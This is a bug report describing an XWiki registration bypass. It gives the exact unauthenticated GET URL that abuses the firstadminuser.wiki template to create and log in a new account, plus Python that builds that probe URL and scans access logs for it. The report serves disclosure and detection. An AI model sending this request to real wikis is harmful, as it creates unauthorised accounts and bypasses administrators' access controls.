Steps to reproduce
- Disable user registration by removing the register right for guest users
- Log out
- Go to <server>/xwiki/bin/view/XWiki/Admin?xpage=xpart&vm=distribution/firstadminuser.wiki&xwikiname=attacker_view&register_password=attacker_view&register2_password=attacker_view
- An error message is displayed.
- You are now logged in as a new user "attacker_view" with password "attacker_view".
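The steps above are a single unauthenticated GET request, so they are easy to both script and hunt for. The following is an added example (not part of this report or of XWiki itself): `build_probe_url` assembles the request from the steps with properly percent-encoded parameters (copied URLs often arrive with `&reg` decoded into `®`, which silently drops the password parameters), and `find_template_abuse` scans access-log lines for any request that renders `distribution/firstadminuser.wiki` through `xpage=xpart`, reporting whether the client was anonymous and which action (`view`, `login`, ...) it went through. The helper names, the combined-log regex and the sample log lines are constructed for this example; the log lines are not real traffic.

```python
"""Probe-URL builder and access-log check for unauthenticated use of the
firstadminuser.wiki template (example code, not from the report or XWiki)."""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Template rendered by the request in the reproduction steps.
TEMPLATE = "distribution/firstadminuser.wiki"


def build_probe_url(base_url, username, password):
    """Build the request from the reproduction steps with explicit encoding.
    urlencode() quotes '/' in the vm value and keeps every '&' intact, so the
    '&reg' -> '(R)' HTML-entity mangling seen in copied URLs cannot happen."""
    params = {
        "xpage": "xpart",
        "vm": TEMPLATE,
        "xwikiname": username,
        "register_password": password,
        "register2_password": password,
    }
    return f"{base_url.rstrip('/')}/xwiki/bin/view/XWiki/Admin?{urlencode(params)}"


# Constructed sample lines in Apache/Tomcat "combined" format (assumption:
# the reverse proxy logs the full request line and the authenticated user).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2022:10:00:01 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2022:10:00:09 +0000] "GET /xwiki/bin/view/XWiki/Admin?xpage=xpart&vm=distribution/firstadminuser.wiki&xwikiname=attacker_view&register_password=attacker_view&register2_password=attacker_view HTTP/1.1" 200 812 "-" "curl/7.81.0"
10.0.0.8 - admin [01/Mar/2022:10:01:00 +0000] "GET /xwiki/bin/view/XWiki/Admin?xpage=xpart&vm=distribution/firstadminuser.wiki&xwikiname=newadmin&register_password=s3cret&register2_password=s3cret HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Mar/2022:10:02:00 +0000] "GET /xwiki/bin/login/XWiki/XWikiLogin?xpage=xpart&vm=distribution%2Ffirstadminuser.wiki&xwikiname=evil&register_password=x&register2_password=x HTTP/1.1" 200 812 "-" "curl/7.81.0"
"""

# ip, ident, authenticated user, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ACTION_RE = re.compile(r"^/xwiki/bin/(?P<action>[^/]+)/")


def find_template_abuse(log_text):
    """Return one record per request that renders the template via xpart.
    parse_qs() percent-decodes values, so 'distribution%2Ffirstadminuser.wiki'
    matches as well as the plain form. Anonymous hits (user field '-') are the
    ones that indicate the registration bypass; an authenticated administrator
    going through the distribution wizard would show a user name instead."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        qs = parse_qs(parts.query)
        if "xpart" not in qs.get("xpage", []) or TEMPLATE not in qs.get("vm", []):
            continue
        action = ACTION_RE.match(parts.path)
        hits.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "anonymous": m.group("user") == "-",
            "action": action.group("action") if action else None,
            "xwikiname": qs.get("xwikiname", [None])[0],
            "sets_password": "register_password" in qs,
            "status": int(m.group("status")),
        })
    return hits


if __name__ == "__main__":
    print(build_probe_url("https://wiki.example", "attacker_view", "attacker_view"))
    for hit in find_template_abuse(SAMPLE_LOG):
        flag = "ANON" if hit["anonymous"] else "auth"
        print(f"{flag} {hit['ip']} {hit['action']} xwikiname={hit['xwikiname']} "
              f"password_set={hit['sets_password']} status={hit['status']}")
```

Of the three hits in the sample, the two anonymous ones are the pattern from the steps above (one through `view`, one through the `login` action mentioned below); the authenticated one from `admin` is the kind of request a legitimate distribution-wizard run could produce and is reported but not flagged as anonymous. Because XWiki accepts these parameters on a GET, they land in ordinary access logs, which is what makes this check possible after the fact.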
This also bypasses any email verification that is set up. Note that this attack can also be performed on a fully private wiki using the login action, similar to
XWIKI-19549, but this should be fixed as part of XWIKI-19549.
This issue reproduces on XWiki 8.0 (and current development versions). XWiki 8.0 is the version in which the exploited template was added as part of
XWIKI-13013, so it should be the actual affected version. I assume that this issue does not affect installations using an external authentication system.
Note that while the template includes code to set the newly created user as owner of the current wiki, this only works if the wiki does not have an owner yet, so the user should not have any extra privileges compared to a regular user (though this is still bad in a public wiki where all users have write access and registration is disabled).